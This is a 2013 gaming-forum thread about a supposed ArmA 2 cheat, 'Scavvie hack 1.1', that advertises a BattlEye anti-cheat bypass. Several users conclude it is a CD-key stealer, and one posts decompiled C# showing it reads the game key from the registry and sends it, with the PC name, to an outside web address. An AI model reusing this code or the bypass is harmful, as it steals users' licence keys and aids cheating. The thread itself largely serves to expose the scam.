Scavvie hack 1.1

04/03/2013 16:02 banditodegod#1
So this is Scavvie v1.1!
I fixed the Battleye bypass, it's undetected again!
I still can't use the normal uploader, so here's the link!
[Only registered and activated users can see links. Click Here To Register...]
Leave some feedback for me!
04/03/2013 19:22 gbriel98#2
Here is giving error when entering - Bad Serial key - CD Key invalid , Please Help-me !
04/03/2013 19:25 banditodegod#3
Quote:
Originally Posted by gbriel98 View Post
Here is giving error when entering - Bad Serial key - CD Key invalid , Please Help-me !
Did you open any suspious files recently?
04/03/2013 19:48 gbriel98#4
No, everything was running perfectly right :/

Help me please, with all the hacks I tried not worked, do not know anymore what to do :/
04/03/2013 19:55 banditodegod#5
Quote:
Originally Posted by gbriel98 View Post
No, everything was running perfectly right :/

Help me please, with all the hacks I tried not worked, do not know anymore what to do :/
Do you have skype?
04/03/2013 20:06 gbriel98#6
Skype : gbriel98
04/03/2013 20:29 banditodegod#7
Quote:
Originally Posted by gbriel98 View Post
Skype : gbriel98
Accept me
04/03/2013 20:30 zawi101#8
i think its a keystealer and he steals your key
just an idea
04/03/2013 21:09 [OliverQueen]#9
Quote:
Originally Posted by zawi101 View Post
i think its a keystealer and he steals your key
just an idea
ich denke auch dass es ein stealer ist!hab leider mom keine lust zu testen
04/03/2013 21:14 FynnR#10
Ist zwar kein virus aber mal wieder ein key stealer...
04/04/2013 17:17 zawi101#11
sag ich ja :D irgendwann weiß man das einfach wenn jemand mit 1-20 Beiträgen ein Hack "releast" ^^
04/04/2013 18:03 Graf c0x#12
Code:
private string GetKey64()
    {
      RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Wow6432Node\\Bohemia Interactive Studio\\ArmA 2 OA", true);
      if (registryKey == null || !Enumerable.Contains<string>((IEnumerable<string>) registryKey.GetValueNames(), "Key"))
        return "Key Already Stolen!!!";
      else
        return BitConverter.ToString((byte[]) registryKey.GetValue("Key"));
    }

    private string GetKey()
    {
      RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Bohemia Interactive Studio\\Arma 2 OA", true);
      if (registryKey == null || !Enumerable.Contains<string>((IEnumerable<string>) registryKey.GetValueNames(), "KEY"))
        return this.GetKey64();
      else
        return BitConverter.ToString((byte[]) registryKey.GetValue("KEY"));
    }

    private void Form1_Button1(object sender, EventArgs e)
    {
      WebRequest.Create("http://www.safekeys.theghettogames.info/keys.php?w= 207 PC NAME : " + Interaction.Environ("computername") + "        Key : " + this.GetKey()).GetResponse();
      this.SetKey();
    }